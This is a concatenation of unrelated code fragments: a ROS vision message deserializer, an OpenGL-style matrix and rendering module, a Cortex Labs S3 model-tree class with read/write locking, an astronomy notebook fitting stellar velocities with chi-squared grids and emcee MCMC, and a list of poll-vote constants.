(_v43.seq,) = _get_struct_I().unpack(str[start:end])
_v44 = _v43.stamp
_x = _v44
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v43.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v43.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.results = []
for i in range(0, length):
val2 = vision_msgs.msg.ObjectHypothesisWithPose()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.id = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.id = str[start:end]
start = end
end += 8
(val2.score,) = _get_struct_d().unpack(str[start:end])
_v45 = val2.pose
_v46 = _v45.pose
_v47 = _v46.position
_x = _v47
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v48 = _v46.orientation
_x = _v48
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
start = end
end += 288
_v45.covariance = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=36)
val1.results.append(val2)
_v49 = val1.bbox
_v50 = _v49.center
_v51 = _v50.position
_x = _v51
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
| |
#!/usr/bin/env python3
"""
Duplicate OpenGL coordinate system...
See:
https://gamedev.stackexchange.com/questions/153078/what-can-i-do-with-the-4th-component-of-gl-position
"""
import sys
from math import sin, cos, pi, sqrt
import numpy
scalar = numpy.float64
EPSILON = 1e-6
class Mat(object):
def __init__(self, cs):
A = numpy.array(cs, dtype=scalar)
if len(A.shape)==1:
m = len(A)
A.shape = (m, 1) # col vector
assert len(A.shape)==2, A.shape
self.A = A
self.shape = A.shape
def strvec(self):
v = self.A[:, 0]
s = str(list(v))
return "Mat(%s)"%(s,)
def __str__(self):
if self.shape[1] == 1:
return self.strvec()
A = self.A
rows = [', '.join(["%.6f"%x for x in row]) for row in A]
rows = ["[%s]"%row for row in rows]
rows = "[%s]"%("\n".join(rows),)
rows = rows.replace(".000000", ". ")
return rows
__repr__ = __str__
def __eq__(self, other):
other = Mat.promote(other)
assert self.shape == other.shape
err = numpy.abs(self.A - other.A).sum()
return err < EPSILON
def __ne__(self, other):
return not self.__eq__(other)
def copy(self):
A = self.A.copy()
return Mat(A)
@classmethod
def promote(cls, item):
if isinstance(item, Mat):
return item
m = Mat(item)
return m
@classmethod
def identity(cls, n):
A = numpy.identity(n)
return cls(A)
def __add__(self, other):
other = Mat.promote(other)
assert self.shape == other.shape
A = self.A + other.A
return Mat(A)
def __sub__(self, other):
other = Mat.promote(other)
assert self.shape == other.shape
A = self.A - other.A
return Mat(A)
def __neg__(self):
A = -self.A
return Mat(A)
def __mul__(self, other):
other = Mat.promote(other)
assert self.shape[1] == other.shape[0]
A = numpy.dot(self.A, other.A)
return Mat(A)
def __rmul__(self, r):
A = r*self.A
return Mat(A)
def __getitem__(self, idx):
if type(idx) is tuple:
return self.A[idx] # <------ return
elif type(idx) is slice:
A = self.A[idx]
return Mat(A) # <----- return
if self.shape[1] == 1:
idx = (idx, 0)
return self.A[idx]
def __setitem__(self, idx, value):
if type(idx) is tuple:
pass
elif self.shape[1] == 1:
idx = (idx, 0)
self.A[idx] = value
@classmethod
def frustum(cls, left, right, bottom, top, nearval, farval):
# mesa/src/mesa/math/m_matrix.c
"""
GLfloat x, y, a, b, c, d;
GLfloat m[16];
x = (2.0F*nearval) / (right-left);
y = (2.0F*nearval) / (top-bottom);
a = (right+left) / (right-left);
b = (top+bottom) / (top-bottom);
c = -(farval+nearval) / ( farval-nearval);
d = -(2.0F*farval*nearval) / (farval-nearval); /* error? */
#define M(row,col) m[col*4+row]
M(0,0) = x; M(0,1) = 0.0F; M(0,2) = a; M(0,3) = 0.0F;
M(1,0) = 0.0F; M(1,1) = y; M(1,2) = b; M(1,3) = 0.0F;
M(2,0) = 0.0F; M(2,1) = 0.0F; M(2,2) = c; M(2,3) = d;
M(3,0) = 0.0F; M(3,1) = 0.0F; M(3,2) = -1.0F; M(3,3) = 0.0F;
#undef M
matrix_multf( mat, m, MAT_FLAG_PERSPECTIVE );
"""
pass # TODO
@classmethod
def rotate(cls, angle, x, y, z):
# angle in degrees
s = sin(angle * pi / 180.0)
c = cos(angle * pi / 180.0)
M = cls.identity(4)
r = sqrt(x*x + y*y + z*z)
if r < EPSILON:
return
x /= r
y /= r
z /= r
xx = x * x
yy = y * y
zz = z * z
xy = x * y
yz = y * z
zx = z * x
xs = x * s
ys = y * s
zs = z * s
one_c = 1.0 - c
M[0,0] = (one_c * xx) + c
M[0,1] = (one_c * xy) - zs
M[0,2] = (one_c * zx) + ys
M[0,3] = 0.0
M[1,0] = (one_c * xy) + zs
M[1,1] = (one_c * yy) + c
M[1,2] = (one_c * yz) - xs
M[1,3] = 0.0
M[2,0] = (one_c * zx) - ys
M[2,1] = (one_c * yz) + xs
M[2,2] = (one_c * zz) + c
M[2,3] = 0.0
M[3,0] = 0.0
M[3,1] = 0.0
M[3,2] = 0.0
M[3,3] = 1.0
return M
@classmethod
def translate(cls, *args):
"modelled after glTranslate"
n = len(args)+1
A = numpy.identity(n)
for i,val in enumerate(args):
A[i, n-1] = val
M = cls(A)
return M
@classmethod
def scale(cls, sx, sy, sz):
"modelled after glScale"
A = numpy.identity(4)
A[0, 0] = sx
A[1, 1] = sy
A[2, 2] = sz
M = cls(A)
return M
@classmethod
def perspective(cls, fovy, aspect, z_near, z_far):
"modelled after gluPerspective"
theta = fovy / 2 * pi / 180
delta_z = z_far - z_near
sine = sin(theta)
if (delta_z == 0) or (sine == 0) or (aspect == 0):
return
cotangent = cos(theta) / sine
A = numpy.identity(4)
A[0,0] = cotangent / aspect
A[1,1] = cotangent
A[2,2] = -(z_far + z_near) / delta_z
#A[2,3] = -1
A[3,2] = -1
#A[3,2] = -2 * z_near * z_far / delta_z
A[2,3] = -2 * z_near * z_far / delta_z
A[3,3] = 0
M = Mat(A)
return M
def norm(self):
A = self.A
r = (A*A).sum()**0.5
return r
def normalized(self):
r = self.norm()
assert r>EPSILON
A = self.A / r
return Mat(A)
def cross(self, other):
assert self.shape == (3, 1)
assert other.shape == (3, 1)
cs = [
self[1]*other[2] - self[2]*other[1],
self[2]*other[0] - self[0]*other[2],
self[0]*other[1] - self[1]*other[0]]
return Mat(cs)
def dot(self, other):
assert self.shape == (3, 1)
assert other.shape == (3, 1)
r = (self.A*other.A).sum()
return r
@classmethod
def lookat(cls, eye, center, up):
"modelled after gluLookAt"
eye = cls.promote(eye)
center = cls.promote(center)
up = cls.promote(up)
forward = center - eye
forward = forward.normalized()
side = forward.cross(up)
side = side.normalized()
up = side.cross(forward)
#M = cls.identity(4)
M = numpy.identity(4)
M[0,0] = side[0]
M[1,0] = side[1]
M[2,0] = side[2]
M[0,1] = up[0]
M[1,1] = up[1]
M[2,1] = up[2]
M[0,2] = -forward[0]
M[1,2] = -forward[1]
M[2,2] = -forward[2]
M = M.transpose()
M = Mat(M)
M1 = cls.translate(-eye[0], -eye[1], -eye[2])
M = M*M1
return M
# ----------------------------------------------------------------------
def test_perspective():
width, height = 640, 480
proj = Mat.identity(4)
M = Mat.perspective(45., width/height, 0.1, 100.)
proj = M * proj
assert proj == Mat([
[ 1.8106601, 0., 0., 0., ],
[ 0., 2.4142137, 0., 0., ],
[ 0., 0., -1.002002, -0.2002002, ],
[ 0., 0., -1., 0., ]])
test_perspective()
# ----------------------------------------------------------------------
from bruhat.render.base import SCALE_CM_TO_POINT
from bruhat.render.front import *
def mkpath(pts, closepath=True):
pts = [path.moveto(*pts[0])]+[path.lineto(*p) for p in pts[1:]]
if closepath:
pts.append(path.closepath())
p = path.path(*pts)
return p
class GItem(object):
def __init__(self, verts, epsilon=1e-4):
assert len(verts) >= 3
v0 = verts[0]
for v in verts[1:]:
v0 = v0 + v
center = (1./len(verts))*v0
if epsilon is not None and len(verts)>1:
# try to cover up the seams.
# does not look good with alpha blending
verts = [p + epsilon*(p-center).normalized() for p in verts]
self.verts = verts
self.center = center
def render(self, cvs):
pass
class GPoly(GItem):
def __init__(self, verts, fill=None, stroke=None, epsilon=1e-2):
GItem.__init__(self, verts, epsilon)
self.fill = fill
self.stroke = stroke
v0, v1, v2 = verts[:3]
a = v1-v0
b = v2-v0
ab = a.cross(b)
assert ab.norm() > EPSILON
self.normal = ab.normalized()
def render(self, view, cvs):
GItem.render(self, cvs)
#fill, stroke = view.illuminate(self)
fill = self.fill
stroke = self.stroke
verts = [view.trafo_canvas(v) for v in self.verts]
v = self.center
n = self.normal
if fill is not None:
fill = view.illuminate(v, n, fill)
if stroke is not None:
stroke = view.illuminate(v, n, stroke)
cvs.append(Polygon(verts, fill, stroke))
class GMesh(GItem):
def __init__(self, verts, normals, fill, epsilon=1e-2):
GItem.__init__(self, verts, epsilon)
assert len(verts) >= 3
assert len(verts) == len(normals)
v0, v1, v2 = verts[:3]
a = v1-v0
b = v2-v0
ab = a.cross(b)
normal = ab.normalized()
self.normals = normals
for n in normals:
assert normal.dot(n) > 0.
self.fill = fill
def render(self, view, cvs):
GItem.render(self, cvs)
verts = [view.trafo_canvas(v) for v in self.verts]
fill = self.fill
fills = [view.illuminate(v, n, fill)
for (v,n) in zip(self.verts, self.normals)]
cvs.append(Polymesh(verts, fills))
#class GBall(GItem):
# def __init__(self, point, radius):
# GItem.__init__(self, [point])
# self.radius = radius
#
# def render(self, cvs):
# GItem.render(self, cvs)
class Light(object):
def __init__(self, position, color):
assert position.shape == (3, 1)
self.position = position
self.color = color
class View(object):
def __init__(self, _width=640, _height=480):
#global width, height, viewport, proj, model
scale = 0.05 # XXX 1./SCALE_CM_TO_POINT
width, height = scale*_width, scale*_height
self.viewport = (0., 0., width, height)
self.proj = Mat.identity(4) # Projection matrix
self.model = Mat.identity(4) # ModelView matrix
self.stack = []
| |
# Copyright 2021 Cortex Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import itertools
import os
import threading as td
from typing import List, Dict, Tuple, AbstractSet
from cortex_internal.lib import util
from cortex_internal.lib.concurrency import ReadWriteLock
from cortex_internal.lib.exceptions import CortexException, WithBreak
from cortex_internal.lib.log import configure_logger
from cortex_internal.lib.model.validation import (
validate_models_dir_paths,
validate_model_paths,
ModelVersion,
)
from cortex_internal.lib.storage import S3
from cortex_internal.lib.type import HandlerType
logger = configure_logger("cortex", os.environ["CORTEX_LOG_CONFIG_FILE"])
class ModelsTree:
"""
Model tree for S3 models.
"""
def __init__(self):
self.models = {}
self._locks = {}
self._create_lock = td.RLock()
self._removable = set()
def acquire(self, mode: str, model_name: str, model_version: str) -> None:
"""
Acquire shared/exclusive (R/W) access for a specific model. Use this when multiple threads are used.
Args:
mode: "r" for read lock, "w" for write lock.
model_name: The name of the model.
model_version: The version of the model.
"""
model_id = f"{model_name}-{model_version}"
if not model_id in self._locks:
lock = ReadWriteLock()
self._create_lock.acquire()
if model_id not in self._locks:
self._locks[model_id] = lock
self._create_lock.release()
self._locks[model_id].acquire(mode)
def release(self, mode: str, model_name: str, model_version: str) -> None:
"""
Release shared/exclusive (R/W) access for a specific model. Use this when multiple threads are used.
Args:
mode: "r" for read lock, "w" for write lock.
model_name: The name of the model.
model_version: The version of the model.
"""
model_id = f"{model_name}-{model_version}"
self._locks[model_id].release(mode)
def update_models(
self,
model_names: List[str],
model_versions: Dict[str, List[str]],
model_paths: List[str],
sub_paths: List[List[str]],
timestamps: List[List[datetime.datetime]],
bucket_names: List[str],
) -> Tuple[AbstractSet[str], AbstractSet[str]]:
"""
Updates the model tree with the latest from the upstream and removes stale models.
Locking is not required. Locking is already done within the method.
Args:
model_names: The unique names of the models as discovered in models:dir or specified in models:paths.
model_versions: The detected versions of each model. If the list is empty, then version "1" should be assumed. The dictionary keys represent the models' names.
model_paths: S3 model paths to each model.
sub_paths: A list of filepaths lists for each file of each model.
timestamps: When was each versioned model updated the last time on the upstream. When no versions are passed, a timestamp is still expected.
bucket_names: A list with the bucket_names required for each model. Empty elements if no bucket is used.
Returns:
The loaded model IDs ("<model-name>-<model-version") that haven't been found in the passed parameters.
Which model IDs have been updated. If these model IDs are in memory or on disk already, then they should get updated as well.
Also sets an info attribute which might look like this:
{
"<model-name>": ,
}
And where "versions" represents the available versions of a model <model-name> and each "timestamps" element is the corresponding
last-edit time of each versioned model.
"""
current_model_ids = set()
updated_model_ids = set()
for idx in range(len(model_names)):
model_name = model_names[idx]
if len(model_versions[model_name]) == 0:
model_id = f"{model_name}-1"
with LockedModelsTree(self, "w", model_name, "1"):
updated = self.update_model(
bucket_names[idx],
model_name,
"1",
model_paths[idx],
sub_paths[idx],
timestamps[idx][0],
True,
)
current_model_ids.add(model_id)
if updated:
updated_model_ids.add(model_id)
for v_idx, model_version in enumerate(model_versions[model_name]):
model_id = f"{model_name}-{model_version}"
with LockedModelsTree(self, "w", model_name, model_version):
updated = self.update_model(
bucket_names[idx],
model_name,
model_version,
os.path.join(model_paths[idx], model_version) + "/",
sub_paths[idx],
timestamps[idx][v_idx],
True,
)
current_model_ids.add(model_id)
if updated:
updated_model_ids.add(model_id)
old_model_ids = set(self.models.keys()) - current_model_ids
for old_model_id in old_model_ids:
model_name, model_version = old_model_id.rsplit("-", maxsplit=1)
if old_model_id not in self._removable:
continue
with LockedModelsTree(self, "w", model_name, model_version):
del self.models[old_model_id]
self._removable = self._removable - set([old_model_id])
return old_model_ids, updated_model_ids
def update_model(
self,
bucket: str,
model_name: str,
model_version: str,
model_path: str,
sub_paths: List[str],
timestamp: datetime.datetime,
removable: bool,
) -> bool:
"""
Updates the model tree with the given model.
Locking is required.
Args:
bucket: The bucket on which the model is stored. Empty if there's no bucket.
model_name: The unique name of the model as discovered in models:dir or specified in models:paths.
model_version: A detected version of the model.
model_path: The model path to the versioned model.
sub_paths: A list of filepaths for each file of the model.
timestamp: When was the model path updated the last time.
removable: If update_models method is allowed to remove the model.
Returns:
True if the model wasn't in the tree or if the timestamp is newer. False otherwise.
"""
model_id = f"{model_name}-{model_version}"
has_changed = False
if model_id not in self.models:
has_changed = True
elif self.models[model_id]["timestamp"] < timestamp:
has_changed = True
if has_changed or model_id in self.models:
self.models[model_id] = {
"bucket": bucket,
"path": model_path,
"sub_paths": sub_paths,
"timestamp": timestamp,
}
if removable:
self._removable.add(model_id)
else:
self._removable = self._removable - set([model_id])
return has_changed
def model_info(self, model_name: str) -> dict:
"""
Gets model info about the available versions and model timestamps.
Locking is not required.
Returns:
A dict with keys "bucket", "model_paths, "versions" and "timestamps".
"model_paths" contains the s3 prefixes of each versioned model, "versions" represents the available versions of the model,
and each "timestamps" element is the corresponding last-edit time of each versioned model.
Empty lists are returned if the model is not found.
Example of returned dictionary for model_name.
```json
{
"bucket": "bucket-0",
"model_paths": ["modelA/1", "modelA/4", "modelA/7", ...],
"versions": [1,4,7, ...],
"timestamps": [12884999, 12874449, 12344931, ...]
}
```
"""
info = {
"model_paths": [],
"versions": [],
"timestamps": [],
}
# to ensure atomicity
models = self.models.copy()
for model_id in models:
_model_name, model_version = model_id.rsplit("-", maxsplit=1)
if _model_name == model_name:
if "bucket" not in info:
info["bucket"] = models[model_id]["bucket"]
info["model_paths"] += [os.path.join(models[model_id]["path"], model_version)]
info["versions"] += [model_version]
info["timestamps"] += [models[model_id]["timestamp"]]
return info
def get_model_names(self) -> List[str]:
"""
Gets the available model names.
Locking is not required.
Returns:
List of all model names.
"""
model_names = set()
# to ensure atomicity
models = self.models.copy()
for model_id in models:
model_name = model_id.rsplit("-", maxsplit=1)[0]
model_names.add(model_name)
return list(model_names)
def get_all_models_info(self) -> dict:
"""
Gets model info about the available versions and model timestamps.
Locking is not required.
It's like model_info method, but for all model names.
Example of returned dictionary.
```json
{
...
"modelA": {
"bucket": "bucket-0",
"model_paths": ["modelA/1", "modelA/4", "modelA/7", ...],
"versions": ["1","4","7", ...],
"timestamps": [12884999, 12874449, 12344931, ...]
}
...
}
```
"""
models_info = {}
# to ensure atomicity
models = self.models.copy()
# extract model names
model_names = set()
for model_id in models:
model_name = model_id.rsplit("-", maxsplit=1)[0]
model_names.add(model_name)
model_names = list(model_names)
# build models info dictionary
for model_name in model_names:
model_info = {
"model_paths": [],
"versions": [],
"timestamps": [],
}
for model_id in models:
_model_name, model_version = model_id.rsplit("-", maxsplit=1)
if _model_name == model_name:
if "bucket" not in model_info:
model_info["bucket"] = models[model_id]["bucket"]
model_info["model_paths"] += [
os.path.join(models[model_id]["path"], model_version)
]
model_info["versions"] += [model_version]
model_info["timestamps"] += [int(models[model_id]["timestamp"].timestamp())]
models_info[model_name] = model_info
return models_info
def __getitem__(self, model_id: str) -> dict:
"""
Each value of a key (model ID) is a dictionary with the following format:
{
"bucket": <bucket-of-the-model>,
"path": <path-of-the-model>,
"sub_paths": <sub-path-of-each-file-of-the-model>,
"timestamp": <when-was-the-model-last-modified>
}
Locking is required.
"""
return self.models[model_id].copy()
def __contains__(self, model_id: str) -> bool:
"""
Each value of a key (model ID) is a dictionary with the following format:
{
"bucket": <bucket-of-the-model>,
"path": <path-of-the-model>,
"sub_paths": <sub-path-of-each-file-of-the-model>,
"timestamp": <when-was-the-model-last-modified>
}
Locking is required.
"""
return model_id in self.models
class LockedModelsTree:
"""
When acquiring shared/exclusive (R/W) access to a model resource (model name + version).
Locks just for a specific model. Apply read lock when granting shared access or write lock when it's exclusive access (for adding/removing operations).
The context manager can be exited by raising cortex_internal.lib.exceptions.WithBreak.
"""
def __init__(self, tree: ModelsTree, mode: str, model_name: str, model_version: str):
"""
mode can be "r" for read or "w" for write.
"""
self._tree = tree
self._mode = mode
self._model_name = model_name
self._model_version = model_version
def __enter__(self):
self._tree.acquire(self._mode, self._model_name, self._model_version)
return self
def __exit__(self, exc_type, exc_value, traceback) -> bool:
self._tree.release(self._mode, | |
# velocity, smoothing, and (bonus) continuum value (m,b)
# If you use 4 parameters, this will get ugly.
#
# Calculate errors from your chi2 contours on the velocity only.
v_guess = [-400,-400,-50]
lsf_grid = np.arange(5,30,1)
for id,vg in zip(star_id,v_guess):
# SET DATA SPECTRUM AND INITIALIZE VELOCITY GRID
data = hdu[id].data
wmask = (data['OPT_WAVE'] > 8300) & (data['OPT_WAVE'] < 8700)
v_grid = np.arange(-15,15,0.1) + vg
# DOUBLE FOR LOOP, HERE WE COME!
chi2_grid, v_arr, lsf_arr = [],[],[]
for v in v_grid:
for lsf in lsf_grid:
# SHIFT SYNTHETIC WAVELENGTH
shifted_wave = pwave * (1 + v/2.997924e5)
# SMOOTH TEMPLATE
synthetic_smooth = smooth_spectrum(pflux, lsf)
# MATCH CONTINUUM
model = fit_continuum(shifted_wave, synthetic_smooth, data['OPT_WAVE'][wmask], data['OPT_COUNTS'][wmask])
# CALCULATE CHI2 AND APPEND
c = calc_chi2(data['OPT_COUNTS'][wmask], model, data['OPT_COUNTS_IVAR'][wmask])
chi2_grid = np.append(chi2_grid,c)
v_arr = np.append(v_arr,v)
lsf_arr = np.append(lsf_arr,lsf)
# PLOT CHI2 RESULTS
fig, ax = plt.subplots(figsize=(8,5))
idx_min = np.argmin(chi2_grid)
# FIND ERROR
msk = chi2_grid < (np.min(chi2_grid) + 1.)
v_err = (np.max(v_arr[msk]) - np.min(v_arr[msk]))/2.
plt.scatter(v_arr,lsf_arr,c=chi2_grid,marker='o',s=35, vmin=chi2_grid[idx_min],vmax =chi2_grid[idx_min]+1000)
str = 'Q7, STAR ID: {} Velocity = {:0.1f} +/- {:0.2f} kms Line Width = {} pixels'.format(id, v_arr[idx_min],v_err,lsf_arr[idx_min])
plt.plot(v_arr[idx_min],lsf_arr[idx_min],'ro')
plt.xlabel('Velocity (km/s)')
plt.ylabel('Line Spread (pixels)')
plt.title(str)
# ### Question 8: MCMC with to find velocity
# Repeat Question 7 but this time fitting with MCMC. We suggest writing a single function `make_model` which creates a single synthetic model spectrum given an input velocity and smoothing.
# Report your best fit velocity and errors.
#
# You can chose to fit 2 parameters (velocity and smoothing), or as a bonus all 4 parameters (velocity, smoothing and continuum fit values).
# In[130]:
import emcee
import corner
# In[131]:
# MCMC to find velocity only. Report your best fit velocity and errors.
# Plot full corner plots for all fitted parameters.
def mk_model(theta, data_wave, data_flux, data_ivar, syn_wave, syn_flux):
'''
Create a model spectrum
'''
# SHIFT SYNTHETIC WAVELENGTH
shifted_wave = syn_wave * (1 + theta[0]/2.997924e5)
# SMOOTH TEMPLATE
synthetic_smooth = smooth_spectrum(syn_flux, theta[1])
# MATCH CONTINUUM
model = fit_continuum(shifted_wave, synthetic_smooth, data_wave, data_flux)
return model
# In[132]:
def lnprob(theta, data_wave, data_flux, data_ivar, syn_wave, syn_flux):
'''
Evaluate whether to accept sample
'''
lp = lnprior(theta)
if not np.isfinite(lp):
return -np.inf
return lp + lnlike(theta, data_wave, data_flux, data_ivar, syn_wave, syn_flux)
def lnprior(theta):
'''
Set priors on parameters
'''
if (-500 < theta[0] < 500) & (1 < theta[1] < 50):
return 0.0
return -np.inf
def lnlike(theta, data_wave, data_flux, data_ivar, syn_wave, syn_flux):
'''
Evaluate the log-likelihood
Parameters
----------
theta: float array
Current values of fitted parameters
x,y, sigma: float arrays
Data points and one sigma errors
Returns
-------
lnl
log-likelihood value
'''
# MAKE MODEL
model = mk_model(theta, data_wave, data_flux, data_ivar, syn_wave, syn_flux)
# EVALUATE LIKELIHOOD
chi2 = ((data_flux - model)**2)*data_ivar
lnl = -0.5 * np.sum(chi2)
return lnl
def initialize_walkers(vguess,lguess):
'''
Initialize the walkers using an initial guess
'''
# Two free parameters (m,b) and 20 walkers
ndim, nwalkers = 2, 20
p0 = np.random.rand(ndim * nwalkers).reshape((nwalkers, ndim))
# initialize slope
p0[:,0] = (p0[:,0]*50. - 25) + vguess
# initialize intercept
p0[:,1] = (p0[:,1] * 5) + lguess
p0 = [np.array([vguess,lguess]) + 1e-4 * np.random.randn(ndim) for i in range(nwalkers)]
return ndim,nwalkers,p0
# In[133]:
def plot_mcmc(sampler, burnin, ndim):
'''
Plot emcee sample chains and make corner plot
'''
fig, (ax1, ax2) = plt.subplots(1, 2,figsize=(20,5))
for ii in range(20):
ax1.plot(sampler.chain[ii,:,0], color="k",linewidth=0.5)
for ii in range(20):
ax2.plot(sampler.chain[ii,:,1], color="k",linewidth=0.5)
ax1.set_ylabel('Velocity (km/s)')
ax2.set_ylabel('Line Width (pixels)')
ax1.set_xlabel('Step Number')
ax2.set_xlabel('Step Number')
ax1.set_title('Velocity (V) Sample chains')
ax2.set_title('Smoothing (LSF) Sample chains')
ax1.axvline(burnin,label='Burn-in')
ax2.axvline(burnin)
ax1.legend()
# PLOT CORNER
labels=['v','lsf']
samples = sampler.chain[:, burnin:, :].reshape((-1, ndim))
fig = corner.corner(samples, labels=labels,show_titles=True,quantiles=[0.16, 0.5, 0.84])
# return best_v,best_v_err
# In[134]:
def plot_best_fit(best_v,best_lsf,data_wave,data_flux,data_ivar,starid):
'''
Plot best fitting model over science spectrum
'''
template_file_name = 'dmost_lte_5000_3.0_-2.0_.fits'
syn_wave, syn_flux = read_synthetic_spectrum(template_file_name)
model = mk_model([best_v,best_lsf], data_wave, data_flux, data_ivar, syn_wave, syn_flux)
fig,ax = plt.subplots(figsize=(15,4))
ax.plot(data_wave,data_flux,label = 'Science')
ax.plot(data_wave, model, label='Best Fit Model')
ax.set_xlabel('Wavelength (Ang)')
ax.set_ylabel('Flux')
ax.set_xlim(8300,8700)
ax.set_title('Star ID: {}'.format(starid))
plt.legend()
# In[135]:
def run_mcmc(starid, vguess, lguess, hdu, max_n = 1000):
'''
Set up MCMC and run
'''
data = hdu[starid].data
data_wave = data['OPT_WAVE']
wmask = (data_wave > 8300) & (data_wave < 8700)
data_wave = data_wave[wmask]
data_flux = data['OPT_COUNTS'][wmask]
data_ivar = data['OPT_COUNTS_IVAR'][wmask]
template_file_name = 'dmost_lte_5000_3.0_-2.0_.fits'
syn_wave, syn_flux = read_synthetic_spectrum(template_file_name)
ndim, nwalkers, p0 = initialize_walkers(vguess,lguess)
# INITIALIZE SAMPLER
sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, args=(data_wave, data_flux, data_ivar, syn_wave, syn_flux))
# RUN MCMC
pos, prob, state = sampler.run_mcmc(p0, max_n)
# CALCULATE NUMBER OF BURNIN SAMPLES
tau = sampler.get_autocorr_time(tol=0)
burnin = int(2 * np.max(tau))
print('Number of burnin samples: ',burnin)
# CHECK IF THINGS CONVERGED
converged = np.all(tau * 100 < sampler.iteration)
print('Did chains converge [0/1:]? ', np.sum(converged))
# CALCULATE BEST VALUES
best_v = np.mean(sampler.chain[:,burnin:,0])
best_lsf = np.mean(sampler.chain[:,burnin:,1])
best_v_err = (np.percentile(sampler.chain[:,burnin:,0],84) - np.percentile(sampler.chain[:,burnin:,0],16))/2.
print('Best velocity: {:0.2f} +/- {:0.2f} km/s'.format(best_v,best_v_err))
# PLOT STUFF
plot_best_fit(best_v,best_lsf,data_wave,data_flux,data_ivar, starid)
plot_mcmc(sampler, burnin, ndim)
# In[136]:
star_ids = [121, 135, 157]
v_guess = [-400,-405,-50]
lsf_guess = [13,9,15]
# In[137]:
i=0
run_mcmc(star_ids[i], v_guess[i], lsf_guess[i], hdu, max_n = 2000)
# In[138]:
i = 1
run_mcmc(star_ids[i], v_guess[i], lsf_guess[i], hdu, max_n = 2000)
# Thee MCMC results for Star 2 don't look very good. This seems to be very sensitive to input values. Many of you were able to get better looking results!
# In[139]:
i = 2
run_mcmc(star_ids[i], v_guess[i], lsf_guess[i], hdu, max_n = 2000)
# ```{note}
# In the context of MCMC, you'll often hear people talk about "marginalization". This is a classic example. Marginalization is the process of fitting for parameters we care about, plus "nuisance parameters" that we don't (like the smoothing and continuum values), and then "marginalizing out" the nuisance parameters by taking the 1D posterior spread only of the parameter of interest.
# ```
# ### Question 9: MCMC convergence
# Confirm that your MCMC above converged and that you are discarding the appropriate number of samples when determining your parameters (that is the burnin number).
#
# > With 2000 samples, my code did not formally converge yet still provides reliable best fit values. However, the error on these values are less well determined. If I were to publish this work, I would run more samples to ensure the errors are correct.
# ### Question 10: Science
#
# And finally, some science questions:
# 1. Do velocities agree between chi2 and mcmc within error?
# > The velocities agree very well between these methods.
#
# 2. Are the velocity errors the same?
# > The errors for chi2 tend to be smaller.
#
# 3. Are these three stars part of NGC 7006?
# > The velocity of NGC 7006 is -384 km/s. Star 1 and 2 are definitely members of NGC 7006. Star 3 is a foreground star, mostly likely associated with the Milky Way's disk.
#
# ### Bonus: Organizing the spectra/reduction above using OOP
# Here's two classes that do everything above fairly neatly, with an example of their use.
# In[ ]:
class Spectrum():
def __init__(self,file,extension,wl_min=8300,wl_max=8800):
self.ext = extension
self.wl_min = wl_min
self.wl_max = wl_max
self.wave,self.flux,self.unc = self.load_and_truncate(self.ext,wl_min=wl_min,wl_max=wl_max)
def load_and_truncate(self,extension,wl_min,wl_max):
with fits.open(file) as hdu:
h = hdu[extension].header
d = hdu[extension].data
m, = np.where((d['OPT_WAVE']>wl_min)&(d['OPT_WAVE']<wl_max))
flux = d['OPT_COUNTS'][m]
wave = d['OPT_WAVE'][m]
unc = d['OPT_COUNTS_IVAR'][m]
unc = np.sqrt(1./unc)
return wave,flux,unc
def plot(self,other=None):
fig, ax = plt.subplots(figsize=(40,5))
ax.fill_between(self.wave,self.flux-self.unc,self.flux+self.unc,color='gray',alpha=0.2)
ax.plot(self.wave,self.flux,color='k')
if other != None:
if hasattr(other,'wave'):
ax.plot(other.wave,other.flux,color='C1')
else:
#assume tuple x,y
ax.plot(other[0],other[1],color='C1')
ax.set_xlim(self.wl_min,self.wl_max)
ax.set_xticks(np.arange(self.wl_min,self.wl_max,25))
ax.tick_params(direction='in',top=True,right=True,length=10,labelsize=14)
ax.set_ylabel('Flux',fontsize=15)
ax.set_xlabel('wavelength',fontsize=15)
return fig, ax
def chi_squared(self,flux):
chi2 = 0.5*np.sum((self.flux - flux)**2/self.unc**2)
red_chi2 = chi2 / (len(self.flux)+2)
return chi2, red_chi2
class FitSynthetic():
def __init__(self,fname):
with fits.open(fname) as hdu:
data = hdu[1].data
self.flux = np.array(data['flux']).flatten()
awave = np.exp((data['wave']).flatten())
# CONVERTING AIR WAVELENGTHS TO VACUUM
s = 10**4 / awave
n = 1. + 0.00008336624212083 + (0.02408926869968 / (130.1065924522 - s**2)) + (0.0001599740894897 / (38.92568793293 - s**2))
self.wave = awave*n
def add_spectrum(self,spec):
self.spec = spec
def match_continuum(self,plot=False):
synth_interp = np.interp(self.spec.wave,self.wave,self.flux)
response_fn = synth_interp / self.spec.flux
fit_response = iterative_polyfit(self.spec.wave,response_fn,1)
fit_vals = np.polyval(fit_response,self.wave)
if plot:
fig,ax=plt.subplots(figsize=(40,5))
ax.plot(self.spec.wave,response_fn)
ax.plot(self.wave,fit_vals)
ax.set_xlim(8300,8800)
self.matched_flux = self.flux / fit_vals
def get_model(self,velocity,sigma=25):
'''
Shift, | |
= 1000
poll_vote_no = 0
poll_vote_yes = 1
poll_vote_admin_no = 2
poll_vote_admin_yes = 3
poll_vote_abstain = 4
poll_result_no = -1
poll_result_yes = -2
poll_result_admin_no = -3
poll_result_admin_yes = -4
poll_result_existing = -5
poll_result_invalid = -6
poll_result_color = 0xFF0000
